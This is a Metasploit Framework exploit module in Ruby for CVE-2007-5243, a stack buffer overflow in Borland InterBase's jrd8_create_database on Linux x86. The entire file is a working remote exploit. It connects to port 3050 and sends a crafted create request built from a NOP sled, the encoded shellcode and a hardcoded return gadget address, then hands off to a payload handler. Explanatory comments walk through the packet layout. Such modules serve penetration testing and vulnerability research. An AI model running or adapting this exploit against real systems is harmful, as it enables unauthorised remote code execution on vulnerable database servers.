GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/misc/ib_jrd8_create_database.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata. There is one target (Linux x86 InterBase builds listed
  # below); its 'Ret' is a pop esi / pop ebp / ret gadget at 0x0804cbe4.
  # The only option registered here is RPORT, defaulting to 3050.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Borland InterBase jrd8_create_database() Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Borland InterBase
          by sending a specially crafted create request.
        },
        'Author' => [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>'
        ],
        'Arch' => ARCH_X86,
        'Platform' => 'linux',
        'References' => [
          [ 'CVE', '2007-5243' ],
          [ 'OSVDB', '38606' ],
          [ 'BID', '25917' ],
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ]
        ],
        'Privileged' => true,
        'License' => MSF_LICENSE,
        'Payload' => {
          'Space' => 128,
          'BadChars' => "\x00\x2f\x3a\x40\x5c"
        },
        'Targets' => [
          # 0x0804cbe4 pop esi; pop ebp; ret
          [
            'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',
            { 'Ret' => 0x0804cbe4 }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2007-10-03'
      )
    )

    register_options([ Opt::RPORT(3050) ], self.class)
  end

  # Builds a single create-database request and writes it to the connected
  # socket, then hands off to the payload handler. The request layout is:
  # three big-endian u32 (operation, id, length), a NOP block, the encoded
  # payload, the little-endian target return address, zero padding to a
  # 4-byte boundary, then a u32 length plus random alpha data for the
  # database parameter block.
  def exploit
    connect

    op_create = 20 # operation/packet type for "create"
    length = 544   # declared length of the first field

    # Pad the first field so its total size is a multiple of 4.
    padding = (4 - (length % 4)) % 4

    shellcode = payload.encoded

    request = String.new

    # Operation, id, length — all network byte order.
    request << [op_create, 0, length].pack('NNN')

    # NOP block sized so that nops + payload + return address == length;
    # execution is expected to return into this block.
    request << make_nops(length - shellcode.length - 4)
    request << shellcode
    request << [target.ret].pack('V')
    request << ("\x00" * padding)

    # Database parameter block: length, then that many random alpha bytes.
    dpb_length = 1024 * 32
    request << [dpb_length].pack('N')
    request << rand_text_alpha(dpb_length)

    sock.put(request)

    handler
  end
end